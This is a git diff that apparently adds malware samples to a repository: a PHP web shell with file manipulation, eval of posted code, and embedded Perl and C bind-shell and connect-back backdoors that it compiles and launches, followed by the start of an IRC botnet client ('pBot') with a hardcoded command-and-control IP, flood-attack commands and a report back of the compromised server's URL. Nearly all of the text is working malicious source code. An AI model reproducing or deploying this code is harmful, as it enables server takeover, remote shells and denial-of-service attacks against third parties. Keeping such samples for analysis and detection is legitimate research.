    Addr:
    Login:
    Passw:
    +(example: /etc/hosts)
    +
    + +
    +
    "; + +if($_POST['read_file']){ +$read_file=$_POST['read_file']; +@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error().""); +mysql_create_db("tmp_bd_file") or die("".mysql_error().""); +mysql_select_db("tmp_bd_file") or die("".mysql_error().""); +mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error().""); +mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file"); +$query = "SELECT * FROM tmp_file"; +$result = mysql_query($query) or die("".mysql_error().""); +print "File content:

    "; +for($i=0;$i$col_value) { +print htmlspecialchars($col_value)."
    ";}} +mysql_free_result($result); +mysql_drop_db("tmp_bd_file") or die("".mysql_error().""); +} + + +print $copyr; +die; +}#end of read_file_safe_mode + + +# sys +$wich_f=$_GET['wich_f']; +$delete=$_GET['delete']; +$del_f=$_GET['del_f']; +$chmod=$_GET['chmod']; +$ccopy_to=$_GET['ccopy_to']; + + +# delete +if(@$_GET['del_f']){ +if(!isset($delete)){ +print "Delete this file?
    +$d/$wich_f

    +Yes / No +";} +if($delete==1){ +unlink($d."/".$del_f); +print "File: $d/$del_f DELETED! +
    # BACK +"; +} +echo $copyr; +exit; +} + + +# copy to +if($ccopy_to){ +$wich_f=$_POST['wich_f']; +$to_f=$_POST['to_f']; +print "Copy file:
    +$d/$ccopy_to

    +
    +
    +File:


    +To:


    +


    +"; + +if($to_f){ +@copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable"); +print "Copy success!!!
    "; +} + +echo $copyr; +exit; +} + + +# chmod +if(@$_GET['chmod']){ +$perms = @fileperms($d."/".$wich_f); +print "CHMOD file $d/$wich_f
    +
    This file chmod is "; +print perm($perms); +print "
    +
    "; +$chmd=<< + + + + + +
    +

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    CHMOD (File Permissions)
    PermissionOwnerGroupOther
    Read
    Write
    Execute
    Octal:=
    Symbolic:=

    +HTML; + +print "
    ".$chmd." + +$d/$wich_f

    + +
    + +"; +$t_total=$_POST['t_total']; +if($t_total){ +chmod($d."/".$wich_f,$t_total); +print "

    Now chmod is $t_total

    "; +print "# BACK

    "; +} +echo $copyr; +exit; +} + +# rename +if(@$_GET['rename']){ +print "RENAME $d/$wich_f ?

    +
    +
    +RENAME
    $wich_f

    TO
    +

    + +
    +"; + +@$rto=$_POST['rto']; + +if($rto){ +$fr1=$d."/".$wich_f; +$fr1=str_replace("//","/",$fr1); +$to1=$d."/".$rto; +$to1=str_replace("//","/",$to1); + +rename($fr1,$to1); +print "File
    $wich_f
    Renamed to $rto

    "; + +echo ""; + +} + +echo $copyr; +exit; +} + + + + +if(@$_GET['deldir']){ +@$dir=$_GET['dir']; +function deldir($dir) +{ +$handle = @opendir($dir); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$dir/$ff")){ +deldir("$dir/$ff"); +}else{ +@unlink("$dir/$ff"); +}}} +@closedir($handle); +if(@rmdir($dir)){ +@$success = true;} +return @$success; +} +$dir=@$dir; +deldir($dir); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo ""; +echo $copyr; +exit;} + + +if(@$_GET['t']=="tools"){ + # unix +if($os=="unix"){ +print " +

    +P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.
    + + + + + + + + +
    [Name][C][Port][Perl][Port][Other options, info]
    Backdoor:
    none
    Back connect:b.c. ip: nc -l -p 5546
    Datapipe:other serv ip: port:
    Web proxy:
    none
    Socks 4 serv:none
    Socks 5 serv:none
    +
    +

    +"; +}#end of unix + + +if($_POST['perl_bd']){ +$port=$_POST['port']; +$perl_bd_scp = " +use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); +setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); +listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} +open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); +close X;}}"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl /tmp/nst_perl_bd.pl &"); +unlink("/tmp/nst_perl_bd.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &"); +unlink(".nst_bd_tmp/nst_perl_bd.pl"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of start perl_bd + +if($_POST['perl_proxy']){ +$port=$_POST['port']; +$perl_proxy_scp = ""; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl /tmp/nst_perl_proxy.pl $port &"); +unlink("/tmp/nst_perl_proxy.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_proxy_tmp"); +$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); +unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); +rmdir(".nst_proxy_tmp"); +} +} +$show_ps="1"; +}#end of start perl_proxy + +if($_POST['c_bd']){ +$port=$_POST['port']; +$c_bd_scp = "#define PORT $port +#include +#include +#include +#include +#include + +int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; +struct sockaddr_in serv_addr; +struct sockaddr_in client_addr; + +int main () +{ + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (soc_des == -1) + exit(-1); + bzero((char *) &serv_addr, sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(PORT); + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + signal(SIGHUP, SIG_IGN); + if (fork() != 0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + while (1) { + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + if (soc_cli < 0) + exit(0); + cli_pid = getpid(); + server_pid = fork(); + if (server_pid != 0) { + dup2(soc_cli,0); + dup2(soc_cli,1); + dup2(soc_cli,2); + execl(\"/bin/sh\",\"sh\",(char *)0); + close(soc_cli); + exit(0); + } + close(soc_cli); + } +} + +"; + + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); +passthru("nohup /tmp/nst_bd &"); +unlink("/tmp/nst_c_bd.c"); +unlink("/tmp/nst_bd"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); +passthru("nohup .nst_bd_tmp/nst_bd &"); +unlink(".nst_bd_tmp/nst_bd"); +unlink(".nst_bd_tmp/nst_c_bd.c"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of c bd + + +if($_POST['bc_c']){ # nc -l -p 4500 +$port_c = $_POST['port_c']; +$ip=$_POST['ip']; +$bc_c_scp = "#include +#include +#include +#include +#include + +#include +#include + +int fd, sock; +int port = $port_c; +struct sockaddr_in addr; + +char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; +char shell[] = \"/bin/sh\"; + +int main(int argc, char *argv[]) { + while(argc<2) { + fprintf(stderr, \" %s \", argv[0]); + exit(0); } + +addr.sin_family = AF_INET; +addr.sin_port = htons(port); +addr.sin_addr.s_addr = inet_addr(argv[1]); +fd = socket(AF_INET, SOCK_STREAM, 0); +connect(fd, (struct sockaddr*)&addr, sizeof(addr)); + +send(fd, mesg, sizeof(mesg), 0); + +dup2(fd, 0); +dup2(fd, 1); +dup2(fd, 2); +execl(shell, \"in.telnetd\", 0); + +close(fd); +return 1; +} + +"; + +if(is_writable("/tmp")){ +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} +$fp=fopen("/tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); +passthru("nohup /tmp/nst_bc_c $ip &"); +unlink("/tmp/nst_bc_c"); +unlink("/tmp/nst_bc_c.c"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bc_c_tmp"); +$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); +passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &"); +unlink(".nst_bc_c_tmp/nst_bc_c.c"); +unlink(".nst_bc_c_tmp/nst_bc_c"); +rmdir(".nst_bc_c_tmp"); +} +} +$show_ps="1"; + +}#end of back connect C + + +if($_POST['datapipe_pl']){ +$port_2=$_POST['port_2']; +$port_3=$_POST['port_3']; +$ip=$_POST['ip']; +$datapipe_pl = " +#!/usr/bin/perl +# coded by CuTTer (rus hacker) +use IO::Socket; +use POSIX; + +\$localport=$port_2; +\$host=\"$ip\"; +\$port=$port_3; + +\$daemon=1; + +\$DIR = undef; + +## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò) +\$log=0; + + + + +\$| = 1; + +if (\$daemon){ + print \"3anycKaeM daemon\n\"; + + \$pid = fork; + exit if \$pid; + die \"Couldn't fork: \$!\" unless defined(\$pid); + POSIX::setsid() or die \"Can't start a new session: \$!\"; +} + +%o = ('port' => \$localport, + 'toport' => \$port, + 'tohost' => \$host); + +\$ah = IO::Socket::INET->new( + 'LocalPort' => \$localport, + 'Reuse' => 1, + 'Listen' => 10) + || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\"; + +print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log; +\$SIG{'CHLD'} = 'IGNORE'; +\$num = 0; +while (1) { + \$ch = \$ah->accept(); + if (!\$ch) { + print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\"; + next; + } + + printf(\"Íîâûé êëèåíò: host %s, port %s.\n\", + \$ch->peerhost(), \$ch->peerport()) if \$log; + ++\$num; + \$pid = fork(); + if (!defined(\$pid)) { + print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\"; + } elsif (\$pid == 0) { +## Íîâûé ïðîöåññ + \$ah->close(); + Run(\%o, \$ch, \$num); + } else { + print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log; + \$ch->close(); + } +} + + +sub Run { + my(\$o, \$ch, \$num) = @_; + my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, + 'PeerPort' => \$o->{'toport'}); + print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log; + if (!\$th) { + printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\", + \$o->{'tohost'}, \$o->{'toport'}); + exit 0; + } + + my \$fh; + if (\$o->{'dir'}) { + \$fh = Symbol::gensym(); + open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") + or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\"; + } + + \$ch->autoflush(); + \$th->autoflush(); + while (\$ch || \$th) { + print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log; + my \$rin = \"\"; + vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; + vec(\$rin, fileno(\$th), 1) = 1 if \$th; + my(\$rout, \$eout); + select(\$rout = \$rin, undef, \$eout = \$rin, 120); + if (!\$rout && !\$eout) { + print STDERR \"Child: Îøèáêà Timeout.\n\"; + } + my \$cbuffer = \"\"; + my \$tbuffer = \"\"; + + if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { + print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log; + my \$result = sysread(\$ch, \$tbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\"; + exit 0; + } + if (\$result == 0) { + print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log; + exit 0; + } + + print \"Child: Äàííûå: \$cbuffer\n\" if \$log; + } + + if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { + print \"Child: Æäåì äàííûõ.\n\" if \$log; + my \$result = sysread(\$th, \$cbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\"; + exit 0; + } + + if (\$result == 0) { + print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log; + exit 0; + } + + print \"Child: Äàííûå: \$cbuffer\n\" if \$log; + } + + if (\$fh && \$tbuffer) { + (print \$fh \$tbuffer); + } + + while (my \$len = length(\$tbuffer)) { + print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log; + my \$res = syswrite(\$th, \$tbuffer, \$len); + print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log; + if (\$res > 0) { + \$tbuffer = substr(\$tbuffer, \$res); + } else { + print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\"; + } + } + + while (my \$len = length(\$cbuffer)) { + print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log; + my \$res = syswrite(\$ch, \$cbuffer, \$len); + print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log; + if (\$res > 0) { + \$cbuffer = substr(\$cbuffer, \$res); + } else { + print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\"; + } + } + } +} + +"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl /tmp/nst_perl_datapipe.pl &"); +unlink("/tmp/nst_perl_datapipe.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_datapipe_tmp"); +$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); +unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); +rmdir(".nst_datapipe_tmp"); +} +} +$show_ps="1"; + +}#end of datapipe perl + + + + + +if($show_ps=="1"){ +print "
    [ps ux]


    "; +print "
    ";
    +passthru("ps ux");
    +print "


    "; +} + + + +echo "
    md5:
    +
    +md5 online encoder/decoder (brutforce) (php) - [DOWNLOAD] +
    +"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5:
    ";} +echo "
    +
    base64 e/d:

    "; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +Encode:

    +Decode:


    ";} +echo "
    +
    DES:

    +John The Ripper [Web]

    "; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "Des:
    ";} + +print " +eval: +(example: print \"Hello World\";) +
    +<?
    +
    +?>

    + +

    +"; + +function eval_sl($editf){ +if(get_magic_quotes_gpc()==1){ +$editf=stripslashes($editf); +} +return $editf; +} + + +if($_POST['eval']){ +print "RESULT:

    "; +eval(eval_sl($_POST['eval'])); +print "

    "; + +print "PHP:
    \r\n\r\n"; +print "<?\r\n"; +print "
    "; +print htmlspecialchars(eval_sl(($_POST['eval']))); +print "
    "; +print "?>\r\n\r\n


    "; + +} + +echo $copyr; +exit;} + +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +echo " +Replace tool:
    +(You can replace any text)
    +File: $de
    +
    +1. Your ip.
    +2. microsoft.com ip :)
    +Replace this by this + +
    +"; + +if(@$_POST['doit']){ +@$thisX=$_POST['thisX']; +@$bythis=$_POST['bythis']; +@$e=$_GET['e']; +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$thisX","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "
    $thisX Replaced by $bythis
    +[VIew file]


    "; + +} +echo $copyr; +exit;} + + +if(@$_GET['t']=="upload"){ +echo "
    +* Mass upload *
    +File upload:
    +
    +
    +
    +New file name:
    + (if empty, it will be default)
    + +

    +"; + +if(@$_POST['uploadf']){ +$where=$_POST['where']; +$newf=$_POST['newf']; +$where=str_replace("//","/",$where); +if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} +$uploadfile = "$where/".$newf; +if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { +$uploadfile=str_replace("//","/",$uploadfile); +echo "
    Uploaded to $uploadfile

    "; +}else{ +echo "
    Error

    ";} +} +} + +if(@$_GET['t']=="massupload"){ +echo " +Mass upload:
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +

    "; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile1
    ";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile2
    ";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile3
    ";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile4
    ";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile5
    ";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile6
    ";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile7
    ";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile8
    ";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile9
    ";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile10
    ";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile11
    ";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile12
    ";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile13
    ";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile14
    ";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile15
    ";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile16
    ";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile17
    ";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile18
    ";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile19
    ";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile20
    ";} +} +echo $copyr; +exit;} + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="Success $d/$e deleted "; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo ""; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo ""; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "READ ONLY
    ";}} +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +echo " +File contents:
    +$de +
    + + +
    +$c
    +
    +
    + +"; + +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +DELETE: Are you sure?
    +Yes || No +
    +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo " +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +$e=$ef; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "READ ONLY
    ";}} +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +Edit:
    +$de
    "; + +if(!@$_POST['save']){ +print " +
    + + +
    +

    +"; +} +if(@$_POST['save']){ +$editf=@$_POST['editf']; + +if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ +$editf=stripslashes($editf); +} + +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "
    +File edited. +"; +exit; +} +echo $copyr; +exit; +} + + + +echo" + + +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("
    Filename
    Tools
    Size
    Owner/Group
    Perms
    Permission Denied or Folder/Disk does not exist

    $copyr
    "); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); +return $info; +} + + +for($i=0; $i0 $linkd
    DIR 
    $owner/$group$info"; +} + +for($i=0; $i2 $files[$i]
    [options]$siz
    $owner/$group$info"; +} + +echo ""; +echo $copyr; + +?> + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Pbot.a b/PHP/Backdoor.PHP.Pbot.a new file mode 100644 index 00000000..cb337ead --- /dev/null +++ b/PHP/Backdoor.PHP.Pbot.a @@ -0,0 +1,514 @@ + + * Friend: LP + * COMMANDS: + * + * .user //login to the bot + * .logout //logout of the bot + * .die //kill the bot + * .restart //restart the bot + * .mail //send an email + * .dns //dns lookup + * .download //download a file + * .exec // uses exec() //execute a command + * .sexec // uses shell_exec() //execute a command + * .cmd // uses popen() //execute a command + * .info //get system information + * .php // uses eval() //execute php code + * .tcpflood //tcpflood attack + * .udpflood //udpflood attack + * .raw //raw IRC command + * .rndnick //change nickname + * .pscan //port scan + * .safe // test safe_mode (dvl) + * .inbox // test inbox (dvl) + * .conback // conect back (dvl) + * .uname // return shell's uname using a php function (dvl) + * + */ + +set_time_limit(0); +error_reporting(0); +echo "ok!"; + +class pBot +{ + var $config = array("server"=>"76.76.4.183", + "port"=>"55555", + "pass"=>"", + "prefix"=>"TX", + "maxrand"=>"4", + "chan"=>"#n3", + "chan2"=>"#n3", + "key"=>"jimi", + "modes"=>"+p", + "password"=>"und56", + "trigger"=>".", + "hostauth"=>"ircos.org" // * for any hostname (remember: /setvhost pucorp.org) + ); + var $users = array(); + function start() + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + $this->start(); + $ident = $this->config['prefix']; + $alph = range("0","9"); + for($i=0;$i<$this->config['maxrand'];$i++) + $ident .= $alph[rand(0,9)]; + if(strlen($this->config['pass'])>0) + $this->send("PASS ".$this->config['pass']); + $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); + $this->set_nick(); + $this->main(); + } + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." ".$this->config['modes']); + $this->join($this->config['chan'],$this->config['key']); + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + $nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + 